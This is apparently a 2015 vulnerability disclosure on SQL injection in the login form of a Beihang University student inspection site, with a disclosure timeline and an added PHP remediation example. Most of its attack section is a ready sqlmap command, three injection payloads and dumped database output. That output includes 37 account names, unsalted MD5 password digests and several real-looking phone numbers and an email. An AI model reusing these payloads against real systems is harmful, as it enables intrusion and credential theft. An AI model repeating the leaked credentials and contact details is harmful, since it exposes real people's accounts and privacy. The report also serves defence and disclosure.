2015-11-04: Details reported to the vendor; awaiting the vendor's response
2015-11-06: Vendor confirmed; details disclosed to the vendor only
2015-11-16: Details disclosed to core white hats and experts in related fields
2015-11-26: Details disclosed to regular white hats
2015-12-06: Details disclosed to intern white hats
2015-12-21: Details disclosed to the public
Beihang University (Beijing University of Aeronautics and Astronautics, BUAA) was founded in 1952 by merging the aeronautics departments of eight institutions, among them the Tsinghua University, Peiyang University, Xiamen University and Sichuan University of that time. It was the first institution of higher education for aeronautics and astronautics in New China and is now administered by the Ministry of Industry and Information Technology. The university has two campuses, Xueyuan Road and Shahe, covering 3,000 mu with a total floor area of more than 1.5 million square meters. Since its founding, Beihang has consistently been a university prioritized for national development: it was one of the first 16 national key universities, one of the first 22 universities to establish a graduate school after the degree system was restored in the 1980s, among the first admitted to Project 211, and admitted to Project 985 in 2001. After sixty years of development, the university has essentially established the core competitiveness of a research university, markedly strengthened its internal cohesion and its influence at home and abroad, and ranks in the top tier of high-level universities in China.
Address: http://**.**.**.**/student/my/login
python sqlmap.py -u "http://**.**.**.**/student/my/login" --form -p LoginForm[username] --technique=BEU --random-agent --batch -D inspection -T in_user -C user_name,user_id,user_pwd,user_phone,user_qq,user_email,user_nkname --dump
---
Parameter: LoginForm[username] (POST)
    Type: boolean-based blind
    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: LoginForm[username]=bldj') RLIKE (SELECT (CASE WHEN (5130=5130) THEN 0x626c646a ELSE 0x28 END)) AND ('SBlj'='SBlj&LoginForm[password]=&LoginForm[verifyCode]=asGb&B1=%E7%99%BB %E5%BD%95

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: LoginForm[username]=bldj') AND (SELECT 4840 FROM(SELECT COUNT(*),CONCAT(0x716a6a6a71,(SELECT (ELT(4840=4840,1))),0x7171786a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND ('QyKa'='QyKa&LoginForm[password]=&LoginForm[verifyCode]=asGb&B1=%E7%99%BB %E5%BD%95

    Type: UNION query
    Title: MySQL UNION query (NULL) - 63 columns
    Payload: LoginForm[username]=bldj') UNION ALL SELECT CONCAT(0x716a6a6a71,0x534a655a6a45527170425162785371454362464d6c4c7449696f51616d5371786e6559764867496f,0x7171786a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#&LoginForm[password]=&LoginForm[verifyCode]=asGb&B1=%E7%99%BB %E5%BD%95
---
web application technology: PHP 5.3.13, Apache
back-end DBMS: MySQL 5.0
current user: 'inspection@localhost'
current user is DBA: False
database management system users [1]:
[*] 'inspection'@'localhost'
available databases [2]:
[*] information_schema
[*] inspection
Database: inspection
[37 tables]
+---------------------------+
| YiiSession                |
| in_application            |
| in_arrange                |
| in_arrangebak             |
| in_assignxy               |
| in_attendance             |
| in_authassignment         |
| in_authitem               |
| in_authitemchild          |
| in_config                 |
| in_course                 |
| in_courseallocation       |
| in_courseallocationbak    |
| in_coursebak              |
| in_delayed                |
| in_emapp                  |
| in_examinationarrangement |
| in_exemption              |
| in_files                  |
| in_information            |
| in_lookup                 |
| in_organization           |
| in_otinfo                 |
| in_pici                   |
| in_precord                |
| in_professional           |
| in_professionalbak        |
| in_province               |
| in_review                 |
| in_scrollpicture          |
| in_setconfig              |
| in_sjpici                 |
| in_students               |
| in_students_manage        |
| in_teacher                |
| in_user                   |
| in_vestigate              |
+---------------------------+
Database: inspection
Table: in_user
[27 columns]
+-------------------+------------------+
| Column            | Type             |
+-------------------+------------------+
| user_adderss      | varchar(100)     |
| user_authorize    | varchar(500)     |
| user_bddm         | varchar(100)     |
| user_email        | varchar(30)      |
| user_headimg      | varchar(100)     |
| user_id           | int(11) unsigned |
| user_iparr        | varchar(3000)    |
| user_isdel        | int(11)          |
| user_lastip       | varchar(50)      |
| user_lasttime     | int(11)          |
| user_loginnum     | int(11)          |
| user_msn          | varchar(100)     |
| user_name         | varchar(30)      |
| user_nkname       | varchar(100)     |
| user_online       | int(11)          |
| user_organization | int(11)          |
| user_phone        | varchar(50)      |
| user_pwd          | varchar(50)      |
| user_qq           | varchar(50)      |
| user_regtime      | int(11)          |
| user_role         | int(11)          |
| user_rolebz       | varchar(100)     |
| user_sfqz         | varchar(100)     |
| user_status       | int(11)          |
| user_tel          | varchar(50)      |
| user_tel2         | varchar(50)      |
| user_webset       | varchar(100)     |
+-------------------+------------------+
Database: inspection
Table: in_user
[37 entries]
+--------------+---------+----------------------------------+-------------+---------+-----------------------+-------------+
| user_name    | user_id | user_pwd                         | user_phone  | user_qq | user_email            | user_nkname |
+--------------+---------+----------------------------------+-------------+---------+-----------------------+-------------+
| admin        | 1       | 82a4e6229c04c7eea5270cee9219cec8 | NULL        | NULL    | <blank>               | čś\x85级玥ç\x90\x86ĺ\x91\x98 |
| sysadmin     | 2       | 8b803df8479a34c942a39ec906ca6e81 | NULL        | NULL    | <blank>               | çłťçť\x9f玥ç\x90\x86ĺ\x91\x98 |
| hdjgzx       | 3       | 5ee4dad4aaa2154c58c325f257d21bfc | <blank>     | NULL    | <blank>               | ĺ\x8d\x8eä¸\x9c玥ç\x90\x86ä¸\x8eć\x9c\x8dĺ\x8aĄä¸ĺż\x83 |
| hdjgzx1      | 4       | 5ee4dad4aaa2154c58c325f257d21bfc | NULL        | NULL    | NULL                  | ĺ\x8d\x8eä¸\x9cç\x9b\x91玥ä¸ĺż\x83 |
| bjshenhe     | 5       | 14a2ee741534eef7c80edbe89de55924 | <blank>     | NULL    | <blank>               | ĺ\x8c\x97äşŹĺŽĄć ¸çŽĄç\x90\x86 |
| 1000642001   | 10      | 4cd034305b3027762ee2ebfa15edbcb2 | <blank>     | NULL    | <blank>               | ĺ¤\x8fć\x98Ľçş˘ |
| shuangxin    | 11      | e10adc3949ba59abbe56e057f20f883e | <blank>     | NULL    | <blank>               | é\x83业ç\x90´ |
| 1000642003   | 12      | 00044b51262110c94868789ebfb089e8 | <blank>     | NULL    | <blank>               | ć\x88´é\x94\x90 |
| quanhao      | 13      | e10adc3949ba59abbe56e057f20f883e | <blank>     | NULL    | <blank>               | topwater |
| xuhuizx      | 14      | e10adc3949ba59abbe56e057f20f883e | <blank>     | NULL    | <blank>               | allround |
| 10006888     | 15      | e10adc3949ba59abbe56e057f20f883e | <blank>     | NULL    | <blank>               | gxl |
| acking       | 17      | fcea920f7412b5da7be0cf42b8c93759 | <blank>     | NULL    | <blank>               | acking |
| 1000652101   | 18      | e10adc3949ba59abbe56e057f20f883e | <blank>     | NULL    | <blank>               | ć˝\x98çąäş\x91 |
| 1000642004   | 19      | a5407e92b245b0c06017c9e6d381e6b5 | <blank>     | NULL    | <blank>               | é\x99\x88č\x8f\x8a |
| chenju01     | 20      | eeef89774499b8aab48a9e477c0a0794 | <blank>     | NULL    | <blank>               | é\x99\x88č\x8f\x8a |
| 1000641801   | 21      | 80c4b59647a5057d6f463ba95bf0063b | <blank>     | NULL    | <blank>               | ç\x8e\x8bç\x8fŽč\x93\x93 |
| 1000652201   | 22      | 6d8a4276ee71937f560b4ff50651cfe8 | <blank>     | NULL    | <blank>               | 莸波ĺ\x8b\x87 |
| 1000652101   | 24      | c16cdbf424606c50ccd1184361d20ac5 | <blank>     | NULL    | <blank>               | ä˝\x95é\x92° |
| 1000640401   | 25      | ac1c2e86c2a8fb808325d8200d82b0c8 | <blank>     | NULL    | <blank>               | çĽ\x81ĺž\x97ć\x98\x8e |
| 1000640301   | 26      | 20f58afd3043cdaf169ca9f2d3412bd2 | <blank>     | NULL    | <blank>               | ç\x8e\x8bć\x96\x87äź\x9f |
| 1000640501   | 27      | 90aedecc1034df83a9159f85cee09a80 | 1897999500  | NULL    | <blank>               | ĺ\x88\x98çŁ\x8a |
| 1000645101   | 28      | a6a9b25e58a394ad7d7aae309226c8a5 | <blank>     | NULL    | <blank>               | é\x82ąĺ°\x8fĺšł |
| 1000645001   | 29      | 9c1a8a30ac217bb9153e77b991aa6cf1 | <blank>     | NULL    | <blank>               | čľľĺŠ\x95 |
| 1000642101   | 30      | fe1ee07a4acf16deb81efbef42c7b119 | <blank>     | NULL    | <blank>               | ĺ§\x9a鲲 |
| qianlaoshi01 | 31      | cf5d7313034fdff73bdf5cd044916141 | <blank>     | NULL    | <blank>               | ć˝\x9cçť´ĺ\x85´ |
| 1000642002   | 32      | 04ad64c1bfa92ff9061ddf91b797ff9b | <blank>     | NULL    | <blank>               | ĺ\x99č\x8eš |
| 1000646401   | 33      | c80f865e9abc8b415cbc9701214cb3a1 | <blank>     | NULL    | <blank>               | ć\x9bšĺ\x85śçŤŻ |
| beijing      | 34      | e10adc3949ba59abbe56e057f20f883e | <blank>     | NULL    | <blank>               | ĺ\x8c\x97亏 |
| bhceshi      | 35      | d6a21b3940d10ce5753052d5f48c5ee8 | 123456      | NULL    | 11111                 | cj |
| wuzhenyou    | 37      | ae45fcd57b567b6e2ec8f3d5ee73b458 | 13918160512 | NULL    | <blank>               | é\x99\x88ĺ\x8fś |
| sitadi       | 38      | 96e79218965eb72c92a549dd5a330112 | 18918597013 | NULL    | <blank>               | ç\x8e\x8bć\x85§čś\x85 |
| sitadi       | 39      | d04bcd6748b9ceee3063386209fae5e7 | 18918597013 | NULL    | 421032151@**.**.**.** | ç\x8e\x8bć\x85§čś\x85 |
| xinshijie    | 40      | 96e79218965eb72c92a549dd5a330112 | 13916760738 | NULL    | <blank>               | ć˘\x81澡ćŚ\x95 |
| xuesen       | 41      | 21218cca77804d2ba1922c33e0151105 | 15216604364 | NULL    | <blank>               | ć\x9d\x9c棎 |
| haowei       | 42      | 96e79218965eb72c92a549dd5a330112 | <blank>     | NULL    | <blank>               | é˝\x90丽č\x90\x8d |
| nanhui       | 43      | 96e79218965eb72c92a549dd5a330112 | <blank>     | NULL    | <blank>               | é\x83业ç\x90´ |
| bjceshi      | 44      | e10adc3949ba59abbe56e057f20f883e | <blank>     | NULL    | <blank>               | éŤ\x98ĺąą |
+--------------+---------+----------------------------------+-------------+---------+-----------------------+-------------+
Add input filtering.
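The remediation advice above is a single line. As an added example (not code from this report, from the affected site, or from the Yii project), the following PHP contrasts the string-concatenated lookup that the "bldj')" injection points imply with a parameterized lookup, and adds the allowlist check the author asks for as defense in depth. It assumes the real application's query ended in something like WHERE (user_name='...'); the actual query is not on the page. It also assumes a table in_user with the user_name and user_pwd columns shown in the dump, and PHP with PDO and the pdo_sqlite driver so the safe path can run offline against constructed rows.

```php
<?php
// Added example, not code from the report or the affected site.
// Assumptions: PHP 5.3+ with PDO and pdo_sqlite; a table in_user with the
// user_name and user_pwd columns from the dumped schema; the application's
// original WHERE clause had the shape (user_name='...'), which is what the
// reported payloads close with "')".

// Constructed sample data standing in for the real table.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE in_user (user_id INTEGER PRIMARY KEY, user_name TEXT, user_pwd TEXT)');
$db->exec("INSERT INTO in_user (user_id, user_name, user_pwd) VALUES (1, 'admin', 'constructed-digest')");

// VULNERABLE: the form value becomes part of the SQL text. A value that
// contains ') closes the literal and the parenthesis, and whatever follows is
// executed as SQL. This is the pattern sqlmap exploited.
function buildVulnerableSql($username)
{
    return "SELECT user_id, user_pwd FROM in_user WHERE (user_name='" . $username . "')";
}

// FIX: the SQL text is fixed at prepare time; the username travels as a bound
// parameter and cannot alter the statement's structure. In Yii 1.1 the same
// thing is Yii::app()->db->createCommand($sql)->bindValue(':u', $u)->queryRow().
function findUserSafe(PDO $db, $username)
{
    $stmt = $db->prepare('SELECT user_id, user_pwd FROM in_user WHERE (user_name = :u)');
    $stmt->bindValue(':u', $username, PDO::PARAM_STR);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// DEFENSE IN DEPTH (the report's "add filtering"): reject anything that is not
// a plausible account name before it reaches the database. The length cap 30
// matches user_name varchar(30) in the dumped schema; the allowed character
// set is an assumption and must match the site's real account-name policy.
function isValidUsername($username)
{
    return (bool) preg_match('/^[A-Za-z0-9_]{1,30}$/', $username);
}

// One of the injection points sqlmap reported, used here only as an input value.
$payload = "bldj') RLIKE (SELECT (CASE WHEN (5130=5130) THEN 0x626c646a ELSE 0x28 END)) AND ('SBlj'='SBlj";

echo "Allowlist check on the payload: ", isValidUsername($payload) ? "accepted" : "rejected", "\n";
echo "Allowlist check on 'admin':     ", isValidUsername('admin') ? "accepted" : "rejected", "\n\n";

echo "Concatenated statement the server would have run:\n";
echo buildVulnerableSql($payload), "\n\n";   // the literal ends after bldj; the rest is caller-supplied SQL

echo "Parameterized lookup with the same input: ";
var_dump(findUserSafe($db, $payload));        // NULL: no account is literally named that
echo "Parameterized lookup with a real name:    ";
var_dump(findUserSafe($db, 'admin'));         // array with user_id 1
```

Run it with the php command-line binary. Parameterization is the actual fix; the allowlist only narrows what reaches the database and should not be relied on alone. Two further points a defender would take from the dump: the user_pwd values are 32-hex-digit digests and the same digest recurs across many unrelated accounts, which means there is no per-user salt and a single cracked digest opens every account that shares it (store passwords with a salted, slow hash such as PHP's password_hash, available from PHP 5.5; the site reports 5.3.13); and the inspection database account is not a DBA, which limited what sqlmap could reach but did nothing to protect the credential table itself.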
Severity: High
Vulnerability Rank: 10
Confirmed at: 2015-11-06 15:17
CNVD has confirmed the reported issue; it has been forwarded by CNCERT to Saier Education (赛尔教育), which will coordinate remediation with the organization that administers the website.
None yet.